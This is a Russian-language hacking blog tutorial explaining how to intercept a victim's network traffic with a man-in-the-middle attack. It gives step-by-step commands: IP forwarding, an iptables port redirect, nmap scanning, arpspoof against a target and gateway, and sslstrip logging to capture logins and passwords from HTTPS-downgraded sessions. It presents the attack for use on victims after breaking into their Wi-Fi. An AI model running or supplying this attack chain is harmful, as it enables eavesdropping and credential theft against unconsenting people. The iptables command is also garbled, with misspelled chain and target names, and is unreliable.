29 марта, 2024

MITM — прослушиваем трафик жертвы

 

В данной статье мы опишем один из примеров атаки под названием MITM. Man in the middle способен дать вам возможность слушать трафик вашей жертвы. А для этого надо всего лишь «встать» в сети между роутером и компьютером нашей жертвы. Это обычно делается после того, как вы взломали Wi-Fi или попали в локальную сеть. Поэтому надо знать базовые знания по взлому Wi-Fi-роутера, если вы ранее не изучали это, не стоит расстраиваться, на нашем сайте есть такая статья, стоит прочитать её прежде чем приступить к MITM.Сразу же возникает вопрос: «Будем работать из под Linux или из под Windows?», — выбирайте то, что удобно для вас. Лично мы будем работать на Linux.Переходим к SSLStrip: Когда весь интернет был на обычном http, всё было проще, все POST запросы были в открытом виде и добыть логин и пароль жертвы не составляло большого труда. Сейчас же придумали «уникальные» сертификаты SSL, TLS. Из-за них шифруется весь трафик. Https некогда было большой проблемой. Но все решается и был придуман sslstrip, который и поможет нам в решении наших задач. Решить конечно мы сможем не все, есть некоторые ограничения. Потому как киты интернета грамотно строят защиту своих сайтов, а также модные браузеры ограничивают некоторые возможности, и sslstrip в таких случаях не подойдёт, но не стоит забывать, что всё можно обойти более хитрым способом.

Первоначальная настройка нашей системы:

В Linux есть файл под названием:

/proc/sys/net/ipv4/ip_forward

в нём по умолчанию стоит значение 0. Если обратиться к документам Debian, то он покажет нам, что этот параметр запрещает/разрешает передачу пакетов между интерфейсами. Грубо говоря, нам надо включить этот параметр, чтобы мы стали роутером и пересылали пакеты, как нам это надо.

Читать также:  LDAP-серверы способны усилить DDoS-атаку в 46-55 раз

Поэтому вбиваем в команду следующее:

 echo 1 > /proc/sys/net/ipv4/ip_forward

Отлично. При такой записи,

 ip_forward

будет работать у вас до перезагрузки. Если вы хотите изменить этот параметр навечно, то идем в

 /etc/sysctl.conf

и снимаем комментарий

 #net.ipv4.ip_forward=1

 Перейдем к настройке Ip Tables:

В вашу командную строку пишете:

ip tables -t nat -A PEROUTING -p tcp —destination-port 80 -j REDRECT —to-port 8080

-t nat

(тут мы создаем имя таблицы, в нашем случае nat)

-A

(добавляем новое правило в цепочку PREROUTING)

-p tcp--destination-port 80

(указываем порт назначения, ставим 80)

-j

(так мы описываем переход в другую цепочку REDIRECT)

--to-port 8080

(тут все понятно, указываем на какой порт перенаправляем)

Теперь надо узнать шлюз, который стоит по умолчанию и адрес нашей цели. Это легкий этап, и с ним не должно возникнуть каких-либо трудностей. Вводим:

 route -n

Теперь сканируем сеть, чтобы узнать адрес цели. Можно использовать любой сканер. В качестве примера, мы будем использовать nmap. В команду пишем следующее:

 nmap -sS -O 172.20.10.1/25

Подготовительный этап завершен. Теперь перейдем непосредственно к прослушиванию трафика.

Вводим команду:

 arpspoof -i eth0 -t 172.20.10.7 172.20.10.1

и нажимаем Enter. Окно не закрываем, так как нельзя останавливать процесс.

-i eth0

— имя интерфейса

-t 172.20.10.7

— это таргет, наша цель, адрес у вас будет другой

172.20.10.1

— это адрес шлюза

Если вы всё сделали верно, вас должно появиться следующее:

Открываем новый терминал и пишем в него:

 sslstrip -l 8080

Нажимаем Enter и ждем пока цель будет пользоваться интернетом.
Для удобства наблюдения можно в новом терминале набрать команду:

 tail -f sslstrip.log

Если всё сделали верно, вы получите то, что вы хотели получить.

Читать также:  Metasploit для начинающего хакера. Получение доступа к токенам авторизации ( Часть 6)

Надеемся, данная статья была полезна для вас. Команда HelpU.

Добавить комментарий